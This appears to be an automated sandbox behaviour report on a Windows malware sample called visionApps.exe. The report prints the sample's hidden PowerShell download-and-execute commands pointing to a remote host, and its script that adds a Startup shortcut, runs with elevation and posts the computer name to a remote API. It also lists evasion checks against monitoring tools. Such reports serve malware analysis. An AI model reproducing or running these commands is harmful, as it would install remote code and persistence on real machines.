        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: magnification.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: d3d9.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: security.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: idndl.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: version.dll
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: wtsapi32.dll
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: magnification.dll
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: d3d9.dll
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: edgegdi.dll
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: winsta.dll
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: security.dll
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: secur32.dll
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: idndl.dll
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
        Source: app.lnk.6.drLNK file: ..\..\..\..\..\App_86026\visionApps.exe
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: T.pDbW source: visionApps.exe, 0000000A.00000002.2939028613.0000000001CA2000.00000040.00000001.01000000.00000008.sdmp, visionApps.exe, 0000000D.00000002.1975245958.0000000001CA2000.00000040.00000001.01000000.00000008.sdmp

        Data Obfuscation

        barindex
        JScript performs obfuscated calls to suspicious functions
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -Command " iex (iwr https://saffplano.com/download/uploads/eERu", "0", "false");
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($7e48b39eec404fbf99dbdd9b5680ae91);$b0e60cd3400e411ca3fa81015ef36461 = $107a8ad8417946f3a48cad0e0c09e838.TransformFinalBlock($3ade993048214f25821685f07d757371, 0, $3ade993048214f25821
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($ce333cd6ae96462e9b1362f728bcd433);$d990aaa65feb4dce8aca32ba640a9bba = $246ee1d7f3944af7b04c3644c88039a3.TransformFinalBlock($0a8bc424e343404f97714c1452cfaa8f, 0, $0a8bc424e343404f977
        Suspicious powershell command line found
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " iex (iwr https://saffplano.com/download/uploads/eERu1UrKpkUv.txt -UseBasicParsing).Content "
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "iex (iwr https://saffplano.com/download/uploads/KciVS6w55td9u.txt -UseBasicParsing).Content"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " iex (iwr https://saffplano.com/download/uploads/eERu1UrKpkUv.txt -UseBasicParsing).Content "Jump to behavior
        Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
        Source: visionApps.exe.6.drStatic PE information: section name:
        Source: visionApps.exe.6.drStatic PE information: section name:
        Source: visionApps.exe.6.drStatic PE information: section name:
        Source: visionApps.exe.6.drStatic PE information: section name:
        Source: visionApps.exe.6.drStatic PE information: section name:
        Source: visionApps.exe.6.drStatic PE information: section name:
        Source: visionApps.exe.6.drStatic PE information: section name:
        Source: visionApps.exe.6.drStatic PE information: section name:
        Source: visionApps.exe.6.drStatic PE information: section name:
        Source: visionApps.exe.6.drStatic PE information: section name: .themida
        Source: visionApps.exe.6.drStatic PE information: section name: .boot
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB5469D2A5 pushad ; iretd 6_2_00007FFB5469D2A6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB547BDF83 pushad ; iretd 6_2_00007FFB547BDFA1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB547BB033 push eax; iretd 6_2_00007FFB547BB0A1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB547B8149 push ebx; ret 6_2_00007FFB547B814A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB547BF93C push ebx; retf 000Ah6_2_00007FFB547BFC8A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB547B18C1 push E85D6C01h; ret 6_2_00007FFB547B18D9
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB547BFB6D push ebx; retf 000Ah6_2_00007FFB547BFC8A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB547B7C1E push eax; retf 6_2_00007FFB547B7C2D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB547B744E pushad ; iretd 6_2_00007FFB547B747D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB547B747E push eax; iretd 6_2_00007FFB547B748D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB547BFC8D push ebx; retf 000Ah6_2_00007FFB547BFC8A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB547B7BEE pushad ; retf 6_2_00007FFB547B7C1D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB54A883D0 pushfd ; iretd 6_2_00007FFB54A883D1
        Source: visionApps.exe.6.drStatic PE information: section name: entropy: 7.932894477716919
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeJump to dropped file

        Boot Survival

        barindex
        Powershell creates an autostart link
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk") $shell = New-Object -ComObject WScript.Shell $shortcut = $shell.CreateShortcut($shortcutPath) $shortcut.TargetPath = $exePath $shortcut.Save() # Executa o arquivo como administrador Start-Process -FilePath $exePath -Verb RunAs}# URL da API$apiUrl = "https://saffplano.com/fsp/contador/" # Substitua pelo URL correto da API# Obter informaes reais do sistema$nome_pc = $env:COMPUTERNAME # Nome do computador$idioma = (Get-WinSystemLocale).Name # Pas (voc pode obter via API externa)# Dados a serem enviados para a API$dados = @{ nome_pc = $nome_pc idioma = $idioma }# Converter os dados para JSON$dadosJson = $dados | ConvertTo-Json -Depth 10# Enviar requisio POST com Invoke-RestMethodtry { Invoke-RestMethod -Uri $apiUrl -Method Post -Body $dadosJson -ContentType "application/json"} catch {}@{GUID="{9DAFD409-67DE-4108-8EE9-73CD61F5B7BF}"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="2.0.0.0"PowerShellVersion="3.0"ClrVersion="4.0"NestedModules="Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets"CmdletsToExport="Get-AppLockerFileInformation", "Get-AppLockerPolicy", "New-AppLockerPolicy", "Set-AppLockerPolicy", "Test-AppLockerPolicy"HelpInfoUri="https://go.microsoft.com/fwlink/?linkid=285540"}@{ModuleVersion = '1.0.0.0'GUID = '596D7B43-928B-44D4-89E7-17D34740ECC2' Author = 'Microsoft Corporation'CompanyName = 'Microsoft Corporation'Copyright = ' Microsoft Corporation. All rights reserved.'Description = 'Microsoft Application Virtualization Client Module'RequiredAssemblies = 'Microsoft.AppV.AppvClientComConsumer.dll'NestedModules = 'Microsoft.AppV.AppVClientPowerShell', 'AppVClientCmdlets.psm1'ProcessorArchitecture = 'AMD64'# Location from which to download updateable helpHelpInfoURI = "https://go.microsoft.com/fwlink/?LinkId=403112 "FunctionsToExport = 'Get-AppvVirtualProcess', 'Start-AppvVirtualProcess'}@{ModuleVersion = '1.0.0.0'GUID = '0ff02bb8-300a-4262-ac08-e06dd810f1b6'Author = 'Microsoft Corporation'CompanyName = 'Microsoft Corporation'Copyright = '(c) Microsoft Corporation. All rights reserved.'FormatsToProcess = @('BitLocker.Format.ps1xml')ModuleToProcess = 'BitLocker'NestedModules=@('Microsoft.BitLocker.Structures')HelpInfoUri="https://go.microsoft.com/fwlink/?linkid=390755"PowerShellVersion='5.1'CompatiblePSEditions = @('Desktop', 'Core')CLRVersion='4.0'FunctionsToExport=@('Unlock-BitLocker', 'Suspend-BitLocker', 'Resume-BitLocker', 'Remove-BitLockerKeyProtector', 'Lock-BitLocker', 'Get-BitLockerVolume', 'Enable-BitLockerAutoUnlock', 'Enable-BitLocker', 'Disable-BitLockerAutoUnlock', 'Disable-BitLocker', 'Clear-BitLockerAutoUnlock', 'Backup-BitLockerKeyProtector', 'BackupToAAD-BitLockerKeyProtector', 'Add-BitLockerKeyProtector')}# Localized12/07/2019 05:47 AM (GMT)303:6.40.20520 BitLockerStrings.psd1ConvertFrom-StringData -stringdata @' ###PSLOCErrorMountPointNotFound={0} does not have an asso
        Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeWindow searched: window name: RegmonClassJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeWindow searched: window name: RegmonClass
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeWindow searched: window name: FilemonClass
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeWindow searched: window name: PROCMON_WINDOW_CLASS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\app.lnkJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\app.lnkJump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Loading BitLocker PowerShell Module
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Users\user\AppData\Roaming\App_86026 "/grant Everyone:F" /T /C
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
